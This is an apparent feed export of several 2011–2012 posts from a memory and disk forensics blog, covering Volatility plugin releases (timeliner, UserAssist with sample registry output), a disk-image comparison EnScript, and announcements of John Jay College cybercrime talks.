Ending CHS: Cylinder: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)
</p>
</pre>
<p><font color="red"><b>Update: </b></font>Fixed output to 16bit assembly. Thanks for the feedback!</p>
<p>The script can be found <a href="https://raw.github.com/gleeda/misc-scripts/master/misc_python/mbr_parser.py">here</a>.</p>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com19tag:blogger.com,1999:blog-30542938.post-63091784751880737102012-03-23T15:27:00.002-04:002012-03-23T15:32:45.935-04:00Upcoming Cybercrime Studies talk: For a Free Digital Society by Dr. Richard Stallman<p class="MsoNormal" style="text-align: left;"><span style="font-size: 14pt; font-family: "Arial","sans-serif";"><span style="font-size:100%;">Yet another interesting upcoming talk at John Jay College on Tuesday March 27, 2012:</span></span><b><span style="font-size: 24pt; font-family: "Arial","sans-serif";"><br /></span></b></p><p class="MsoNormal" style="text-align: center;" align="center"><b><span style="font-size: 24pt; font-family: "Arial","sans-serif";"><br /></span></b></p><p class="MsoNormal" style="text-align:center" align="center"><b><span style="font-size:24.0pt;font-family:"Arial","sans-serif"">Center for Cybercrime Studies</span></b></p> <p class="MsoNormal" style="text-align:center" align="center"><b><span style="font-size:24.0pt;font-family:"Arial","sans-serif"">John Jay College of Criminal Justice</span></b></p> <p class="MsoNormal" style="text-align:center" align="center"><b><span style="font-size:24.0pt;font-family:"Arial","sans-serif""> </span></b></p> <p class="MsoNormal" style="text-align:center" align="center"><b><span style="font-size:24.0pt;font-family:"Arial","sans-serif"">presents</span></b></p> <p class="MsoNormal" style="text-align:center" align="center"><b><span style="font-size:24.0pt;font-family:"Arial","sans-serif""> </span></b></p> <p class="MsoNormal" style="text-align:center" align="center"><b><span style="font-size:24.0pt;font-family:"Arial","sans-serif"">For a Free Digital Society </span></b><b><span style="font-size:24.0pt;font-family:"Arial","sans-serif""></span></b></p> <p class="MsoNormal" style="text-align:center" align="center"><b><span style="font-size:18.0pt;font-family:"Arial","sans-serif""> </span></b></p> <p class="MsoNormal" style="text-align:center" align="center"><b><span style="font-size:32.0pt;font-family:Pristina">Dr. <span class="il">Richard</span> <span class="il">Stallman</span> </span></b></p> <p class="MsoNormal" style="text-align:center" align="center"><span style="font-size:14.0pt;font-family:"Arial","sans-serif"">President </span></p> <p class="MsoNormal" style="margin-bottom:14.0pt;text-align:center" align="center"> <span style="font-size:14.0pt;font-family:"Arial","sans-serif"">Free Software Foundation </span></p> <p class="MsoNormal" style="text-align:center" align="center"><span style="font-family:"Arial","sans-serif"">Abstract</span><span style="font-size:12.0pt;font-family:"Arial","sans-serif""></span></p> <p style="text-align:justify"><span style="font-size:12.0pt;font-family:"Arial","sans-serif"">Activities directed at ``including'' more people in the use of digital technology are predicated on the assumption that such inclusion is invariably a good thing. It appears so, when judged solely by immediate practical convenience. However, if we also judge in terms of human rights, whether digital inclusion is good or bad depends on what kind of digital world we are to be included in. If we wish to work towards digital inclusion as a goal, it behooves us to make sure it is the good kind.</span></p> <p style="text-align:justify"><span style="font-size:12.0pt;font-family:"Arial","sans-serif""> </span></p> <p style="text-align:justify"><span style="font-size:12.0pt;font-family:"Arial","sans-serif""><span class="il">Richard</span> <span class="il">Stallman</span> launched the free software movement in 1983 and started the development of the GNU operating system (see </span><a href="http://www.gnu.org/" target="_blank"><span style="font-size:12.0pt;font-family:"Arial","sans-serif"">www.gnu.org</span></a><span style="font-size:12.0pt;font-family:"Arial","sans-serif"">) in 1984. GNU is free software: everyone has the freedom to copy it and redistribute it, with or without changes. The GNU/Linux system, basically the GNU operating system with Linux added, is used on tens of millions of computers today. <span class="il">Stallman</span> has received the ACM Grace Hopper Award, a MacArthur Foundation Fellowship, the Electronic Frontier Foundation's Pioneer Award, and the Takeda Award for Social/Economic Betterment, as well as several honorary doctorates.</span></p> <p class="MsoNormal"><span style="font-size:12.0pt;font-family:"Arial","sans-serif""> </span></p> <p class="MsoNormal" style="margin-left:1.0in"><span style="font-size:16.0pt;font-family:"Arial","sans-serif"">Date: Tuesday, March 27, 2012<br />Time: 1:30 PM</span></p> <p class="MsoNormal" style="margin-left:.5in;text-indent:.5in"><span style="font-size:16.0pt;font-family:"Arial","sans-serif"">Location: L.61 Conference Center (New Building)</span></p> <p class="MsoNormal" style="margin-left:.5in;text-indent:.5in"><span style="font-size:16.0pt;font-family:"Arial","sans-serif""> John Jay College of Criminal Justice</span></p> <p class="MsoNormal" style="margin-left:.5in;text-indent:.5in"><span style="font-size:16.0pt;font-family:"Arial","sans-serif""> 899 Tenth Avenue</span></p> <p class="MsoNormal" style="margin-left:2.0in;text-indent:.5in"><span style="font-size:16.0pt;font-family:"Arial","sans-serif"">New York, NY</span></p> <p class="MsoNormal" style="margin-left:2.0in;text-indent:.5in"><span style="font-size:16.0pt;font-family:"Arial","sans-serif""> </span></p> <p class="MsoNormal"><b><i><u><span style="font-family:"Arial","sans-serif"">RSVP</span></u></i></b><b><i><span style="font-family:"Arial","sans-serif"">: Nicole Daniels at <a href="tel:212-237-8920" value="+12122378920" target="_blank">212-237-8920</a> or email </span></i></b><a href="mailto:ndaniels@jjay.cuny.edu" target="_blank"><b><i><span style="font-family:"Arial","sans-serif"">ndaniels@jjay.cuny.edu</span></i></b></a>. <span style="font-family:"Arial","sans-serif"">For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, <a href="tel:212-237-8836" value="+12122378836" target="_blank">212-237-8836</a> or email</span> <a href="mailto:dsalane@jjay.cuny.edu" target="_blank"><span style="font-family:"Arial","sans-serif"">dsalane@jjay.cuny.edu</span></a><span style="font-family:"Arial","sans-serif"">.</span><span style="font-size:12.0pt;font-family:"Arial","sans-serif""></span></p> <p class="MsoNormal"><span style="font-family:"Arial","sans-serif"">For additional Center for Cybercrime Studies events visit our <a href="http://www.jjay.cuny.edu/centers/cybercrime_studies/index.php" target="_blank">web site</a>. </span><span style="font-size:14.0pt"> </span><span style="font-family:"Arial","sans-serif"">Go to </span><a href="http://www.jjay.cuny.edu/" target="_blank"><span style="font-family:"Arial","sans-serif"">WWW.JJAY.CUNY.EDU</span></a> ,<span style="font-family:"Arial","sans-serif""> ACADEMICS, RESEARCH CENTERS and INSTITUTES.</span></p> <p class="MsoNormal"><span style="font-family:"Arial","sans-serif""> </span></p> <span style="font-family:"Arial","sans-serif""><br /></span>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com2tag:blogger.com,1999:blog-30542938.post-66204246050956381862012-03-22T16:54:00.002-04:002012-03-22T17:32:26.139-04:00Differential EnScriptI know I haven't written much in the last few months; I've been busy. Even though I'm writing a blogpost today it's still going to be pretty short... this is because most of what I have to say has already been written up in documentation ahead of time. Today I'm releasing an EnScript that allows you to compare two disk images using various options. The purpose of this EnScript is to find differences on a machine after some event, such as infection, software installation etc. has taken place.<br /><br />I'm also releasing the source in hopes that others will be able to troubleshoot or expand it themselves as needed. I offer no warranties for this script nor promises that it is beautiful code (in all reality this was written hastily out of necessity), this is "as-is" and has worked well enough for me for my purposes. Unlike most of my stuff, I actually took time to create a GUI for it, however, to make it easier to use. Information on how it works can be found in the <a href="http://jls-scripts.googlecode.com/files/Differential%20EnScript%20v1.pdf">documentation</a> (pdf) so I will not cover it here. Hopefully someone out there will find it useful. <br /><br />Please feel free to leave comments and suggestions here or by email. Here is the <a href="https://raw.github.com/gleeda/misc-scripts/master/EnScripts/Differential.EnScript">Differential.EnScript</a>.Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-63445111245250755892012-03-16T09:35:00.003-04:002012-03-16T09:41:20.724-04:00Upcoming Cybercrime Studies talk: Digital Forensic Crime Labs<div style="text-align: center;"><div style="text-align: left;">I just wanted to take the time to announce the following upcoming talk at John Jay College next week:<br /><br /></div><br />The Center for Cybercrime Studies<br /><br />John Jay College of Criminal Justice<br /><br />Presents<br /><br /><br />Digital Forensic Crime Labs<br /><br />Monique Mattei Ferraro<br /><br />M.S., J.D., CISSP<br /><br />Technology Forensics, LLC<br /></div> <br /><br /><br />Digital forensics labs throughout the country were set up and subsidized by United States Department of Justice. Most labs are administered by police or law enforcement agencies. In 2009, the National Academy of Science released “Strengthening Forensic Science in the United States: A Path Forward,” which made several recommendations. Among the recommendations were that criminal labs should be independent of police/law enforcement in order to retain an appearance of objectivity. This talk delves into the tensions between the recommendations and the practice, the ethical implications and current issues affecting digital forensics labs today.<br /><br /><br /><br />Date: Wednesday, March 21, 2012<br />Time: 1:30 PM<br /><br />Location: Haaren Hall, RM 630<br />899 Tenth Avenue<br />(10th Avenue and 59th Street)<br /><br /> <br />RSVP: Nicole Daniels at 212-237-8920 or email <a href="mailto:ndaniels@jjay.cuny.edu">ndaniels@jjay.cuny.edu</a>. For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, 212-237-8836 or email <a href="mailto:dsalane@jjay.cuny.edu">dsalane@jjay.cuny.edu</a>.<br /><br /><span style="font-size:85%;"><span style="font-family:"Arial","sans-serif"">For additional Center for Cybercrime Studies events visit our Web site (<a href="http://www.jjay.cuny.edu/centers/cybercrime_studies/index.php" target="_blank">http://www.jjay.cuny.edu/<wbr>centers/cybercrime_studies/<wbr>index.php</a>) or go to </span><a href="http://www.jjay.cuny.edu/" target="_blank"><span style="font-family:"Arial","sans-serif"">WWW.JJAY.CUNY.EDU</span></a><span style="font-family:"Arial","sans-serif"">, ACADEMICS, RESEARCH CENTERS and INSTITUTES.</span></span>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com1tag:blogger.com,1999:blog-30542938.post-46397046360106624392011-09-13T08:26:00.007-04:002011-09-28T17:06:31.505-04:00Volatility 2.0: Timeliner, RegistryAPI, evtlogs and moreBack in July <a href="http://gleeda.blogspot.com/2011/08/volatility-20-and-omfw.html">I gave a talk</a> at <a href="https://www.volatilesystems.com/default/omfw">OMFW</a> about extracting timeline data from a memory sample using the Volatility framework. Now has come the time to release the plugins that came along with that talk. <br /><br />In addition to the plugins I <a href="http://jls-scripts.googlecode.com/files/Timeliner%20Release%20Documentation.pdf">have included a whitepaper</a> on how these plugins were created and used. It is released more in hopes that people will see how to use the framework and be able to write their own plugins or extend existing ones.<br /><br />I have included all these plugins in a zip file:<br /><br /><pre><p class="code"><br />$ unzip -l timeliner_9-2011.zip <br />Archive: timeliner_9-2011.zip<br /> Length Date Time Name<br /> -------- ---- ---- ----<br /> 14455 09-28-11 14:40 volatility/plugins/timeliner.py<br /> 10789 09-27-11 09:24 volatility/plugins/evtlogs.py<br /> 147458 09-09-11 11:03 volatility/plugins/malware.py<br /> 13559 09-22-11 19:09 volatility/plugins/registryapi.py<br /> 8554 09-18-11 21:33 volatility/plugins/getsids.py<br /> 40993 09-22-11 16:29 volatility/plugins/getservicesids.py<br /> -------- -------<br /> 235808 6 files<br /></p></pre><br /><br /><ul><li>evtlogs.py: plugin to parse Evt logs from XP/2K3</li><li>registryapi.py: plugin for routine registry actions</li><li>getservicesids.py: plugin to collect and calculate service SIDs (used with the new getsids and evtlogs</li><li>timeliner.py: the timeline creating script that pulls everything together</li></ul><br /><br /><a href="http://mnin.blogspot.com/">MHL</a>'s <a href="http://malwarecookbook.googlecode.com/svn/trunk/malware.py">malware malware plugins (malware.py)</a> are included only for convenience. You can also download them from his repository and check there for updates.<br /><br />I would like to thank MHL and AW for their valuable feedback and Bertha M for extensive testing of the timeliner plugins. The links to the paper and plugins are below:<br /><br /><a href="http://jls-scripts.googlecode.com/files/Timeliner%20Release%20Documentation.pdf">Timeliner Release Documentation</a> (PDF)<br /><br /><a href="http://jls-scripts.googlecode.com/files/timeliner_9-2011.zip">timeliner plugins</a> (ZIP)<br /><br /><i>Note: Any updates to these plugins will appear in my <a href="https://github.com/gleeda/Volatility-Plugins">github repository</a> first.</i>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com13tag:blogger.com,1999:blog-30542938.post-1217766874947679902011-08-08T14:27:00.003-04:002011-08-08T14:47:33.240-04:00Volatility 2.0 and OMFWIn case you missed it, <a href="http://volatility.tumblr.com/post/8427878763/volatility-2-0-release-open-memory-forensics-workshop">Volatility 2.0 has been released</a>! Please download it and test it out and let us know if you have any problems via the <a href="http://code.google.com/p/volatility/issues/list">"issues area" of the Google Code project</a>. We have <a href="http://code.google.com/p/volatility/w/list">lots of documentation</a> and for those on Windows who don't like to install Python, there is a standalone executable available in the <a href="http://code.google.com/p/volatility/downloads/list">downloads section</a>. Make sure to check out the <a href="http://code.google.com/p/volatility/wiki/FAQ">FAQ wiki</a> which contains information on what is supported and how to use <a href="http://mnin.blogspot.com/">MHL</a>'s malware plugins.
<br />
<br />Some <a href="https://www.volatilesystems.com/default/omfw">OMFW</a> materials have been released:
<br />
<br /><a href="http://amnesia.gtisc.gatech.edu/~moyix/OMFW_Virtuoso.pdf">Moyix's slides</a> (pdf).
<br /><a href="http://mnin.blogspot.com/2011/06/examining-stuxnets-footprint-in-memory.html">MHL's Stuxnet blogpost and slides</a>.
<br /><a href="https://docs.google.com/leaf?id=0B7mg0ZBnpGuOZjVlYjJmMWMtYTgyYy00OGVlLTkxNmYtZWM2YmJjNzc1Zjc0&hl=en_US">My slides</a> (google docs)
<br />
<br />You can help with the development of Volatility by giving us suggestions for plugins, writing documentation or donating malware samples. Check out the <a href="http://code.google.com/p/volatility/wiki/FAQ">FAQ</a> for how to do all of the above.
<br />
<br />Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-73659307160920548032011-04-30T22:17:00.003-04:002012-01-06T08:32:22.080-05:00Volatility 1.4 UserAssist pluginFrom a computer forensics standpoint, userassist keys can provide a lot of information about user activity (see the <a href="http://windowsir.blogspot.com/2011/04/using-regripper.html">Harlan's posts</a> for more information). <br /><br />After looking at <a href="http://blog.didierstevens.com/">Didier Steven</a>'s article on userassist keys for Windows 7 from <a href="http://intotheboxes.wordpress.com/2010/01/01/into-the-boxes-issue-0x0/">Into the Boxes issue 0x0</a> and RegRipper, I decided to write up a plugin that would pull out UserAssist keys from all versions of windows for <a href="http://code.google.com/p/volatility/">Volatility</a>.<br /><br />One thing I decided to add was an enumeration of GUIDs to human friendly folder names, which were obtained from <a href="http://msdn.microsoft.com/en-us/library/dd378457%28v=vs.85%29.aspx">here</a>.<br /><br />The plugin is available <a href="https://github.com/gleeda/Volatility-Plugins/raw/master/userassist.py">in my git repository</a>. Simply download and place into your volatility/plugins directory and you're set.<br /><br /><font color="red"><b>Update: This plugin is now part of the core <a href="http://code.google.com/p/volatility/">Volatility code</a></b></font><br /><br /><font size="4">Example Output</font><br /><br />Below you can see some snippets of output for Windows 7. The fields are pretty self explanatory, though you can read Didier Steven's article for more details. The hex dump is the actual data from which this information was parsed, just so you can verify it yourself.<br /><pre><p class="code2"><br />$ ./vol.py -f win7.vmem --profile=Win7SP0x86 userassist --no-cache<br />Volatile Systems Volatility Framework 1.4_rc1<br />----------------------------<br />Registry: \??\C:\Users\admin\ntuser.dat<br />Key name: Count<br />Last updated: 2010-07-06 22:40:25 <br /><br />Subkeys:<br /><br />Values:<br />REG_BINARY Microsoft.Windows.GettingStarted : <br />Count: 14<br />Focus Count: 21<br />Time Focused: 0:07:00.500000<br />Last updated: 2010-03-09 19:49:20 <br /><br />0000 00 00 00 00 0E 00 00 00 15 00 00 00 A0 68 06 00 .............h..<br />0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0030 00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C ..............{.<br />0040 C1 BF CA 01 00 00 00 00 ........<br /><br />REG_BINARY UEME_CTLSESSION : <br />Count: 187<br />Focus Count: 1205<br />Time Focused: 6:25:06.216000<br />Last updated: 1970-01-01 00:00:00 <br /><br />0000 00 00 00 00 BB 00 00 00 B5 04 00 00 B4 90 60 01 ..............`.<br />0010 10 00 00 00 39 00 00 00 E9 67 28 00 7B 00 44 00 ....9....g(.{.D.<br />0020 36 00 35 00 32 00 33 00 31 00 42 00 30 00 2D 00 6.5.2.3.1.B.0.-.<br />0030 42 00 32 00 46 00 31 00 2D 00 34 00 38 00 35 00 B.2.F.1.-.4.8.5.<br /><br />[snip]<br /><br />REG_BINARY %windir%\system32\displayswitch.exe : <br />Count: 13<br />Focus Count: 19<br />Time Focused: 0:06:20.500000<br />Last updated: 2010-03-09 19:49:20 <br /><br />0000 00 00 00 00 0D 00 00 00 13 00 00 00 60 CC 05 00 ............`...<br />0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0030 00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C ..............{.<br />0040 C1 BF CA 01 00 00 00 00 ........<br /><br />REG_BINARY %windir%\system32\calc.exe : <br />Count: 12<br />Focus Count: 17<br />Time Focused: 0:05:40.500000<br />Last updated: 2010-03-09 19:49:20 <br /><br />0000 00 00 00 00 0C 00 00 00 11 00 00 00 20 30 05 00 ............ 0..<br />0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0030 00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C ..............{.<br />0040 C1 BF CA 01 00 00 00 00 ........<br /> ........<br /><br />REG_BINARY Z:\vmware-share\apps\odbg110\OLLYDBG.EXE : <br />Count: 11<br />Focus Count: 266<br />Time Focused: 1:19:58.045000<br />Last updated: 2010-03-18 01:56:31 <br /><br />0000 00 00 00 00 0B 00 00 00 0A 01 00 00 69 34 49 00 ............i4I.<br />0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0030 00 00 80 BF 00 00 80 BF FF FF FF FF 70 3B CB 3A ............p;.:<br />0040 3E C6 CA 01 00 00 00 00 >.......<br /><br />REG_BINARY %ProgramFiles%\Microsoft SDKs\Windows\v7.0\Bin\vsstools\vshadow.exe : <br />Count: 0<br />Focus Count: 67<br />Time Focused: 0:06:12.811000<br />Last updated: 1970-01-01 00:00:00 <br /><br />0000 00 00 00 00 00 00 00 00 43 00 00 00 57 AE 05 00 ........C...W...<br />0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0030 00 00 80 BF 00 00 80 BF FF FF FF FF 00 00 00 00 ................<br />0040 00 00 00 00 00 00 00 00 ........<br /><br />REG_BINARY %windir%\regedit.exe : <br />Count: 2<br />Focus Count: 8<br />Time Focused: 0:03:22.626000<br />Last updated: 2010-03-17 23:40:36 <br /><br />0000 00 00 00 00 02 00 00 00 08 00 00 00 8E 15 03 00 ................<br />0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................<br />0030 00 00 80 BF 00 00 80 BF FF FF FF FF 90 3A 93 3E .............:.><br />0040 2B C6 CA 01 00 00 00 00 +.......<br /></p></pre><br /><br />Here you can see an example of output from Windows XP:<br /><br /><pre><p class="code2"><br />$ ./vol.py -f XPSP3.vmem --profile=WinXPSP3x86 userassist --no-cache<br />Volatile Systems Volatility Framework 1.4_rc1<br />----------------------------<br />Registry: \Device\HarddiskVolume1\Documents and Settings\Administrator\NTUSER.DAT<br />Key name: Count<br />Last updated: 2010-11-24 16:35:34 <br /><br />Subkeys:<br /><br />Values:<br />REG_BINARY UEME_CTLSESSION : <br />0000 91 52 5B 0E 1F 00 00 00 .R[.....<br /><br />REG_BINARY UEME_CTLCUACount:ctor : <br />ID: 1<br />Count: 2<br />Last updated: 1970-01-01 00:00:00 <br /><br />0000 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ................<br /><br />REG_BINARY UEME_RUNPATH : <br />ID: 31<br />Count: 589<br />Last updated: 2010-11-24 16:30:49 <br /><br />0000 1F 00 00 00 52 02 00 00 A0 91 09 F4 F4 8B CB 01 ....R...........<br /><br />REG_BINARY UEME_RUNPATH:D:\SETUP.EXE : <br />ID: 30<br />Count: 6<br />Last updated: 2010-09-20 15:02:47 <br /><br />0000 1E 00 00 00 0B 00 00 00 E0 85 39 E3 D4 58 CB 01 ..........9..X..<br /><br />REG_BINARY UEME_RUNPIDL : <br />ID: 31<br />Count: 124<br />Last updated: 2010-11-24 14:19:29 <br /><br />0000 1F 00 00 00 81 00 00 00 50 78 79 9B E2 8B CB 01 ........Pxy.....<br /><br />REG_BINARY UEME_RUNPIDL:%csidl2%\Microsoft Visual Basic 6.0 : <br />ID: 1<br />Count: 2<br />Last updated: 2009-05-12 02:28:10 <br /><br />0000 01 00 00 00 02 00 00 00 B0 1E DB 4A A9 D2 C9 01 ...........J....<br /><br />REG_BINARY UEME_RUNPATH:C:\Program Files\Microsoft Visual Studio\VB98\VB6.EXE : <br />ID: 1<br />Count: 1<br />Last updated: 2009-05-12 02:28:10 <br /><br />0000 01 00 00 00 06 00 00 00 50 62 FC 4A A9 D2 C9 01 ........Pb.J....<br /><br />REG_BINARY UEME_RUNPIDL:C:\Documents and Settings\All Users\Start Menu\Windows Update.lnk : <br />ID: 1<br />Count: 1<br />Last updated: 2009-05-12 02:28:36 <br /><br />0000 01 00 00 00 06 00 00 00 F0 D0 A1 5A A9 D2 C9 01 ...........Z....<br /><br />REG_BINARY UEME_RUNPATH:C:\WINDOWS\system32\wupdmgr.exe : <br />ID: 31<br />Count: 2<br />Last updated: 2010-11-24 14:50:05 <br /></p></pre><br /><br /><br />Shoutz to ikelos for helping me optimize this :-)<br /><br /><br />References:<br /><br />Into the Boxes issue 0x0 <a href="http://intotheboxes.wordpress.com/2010/01/01/into-the-boxes-issue-0x0/">http://intotheboxes.wordpress.com/2010/01/01/into-the-boxes-issue-0x0/</a><br /><br />RegRipper <a href="http://regripper.wordpress.com/">http://regripper.wordpress.com/</a>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com2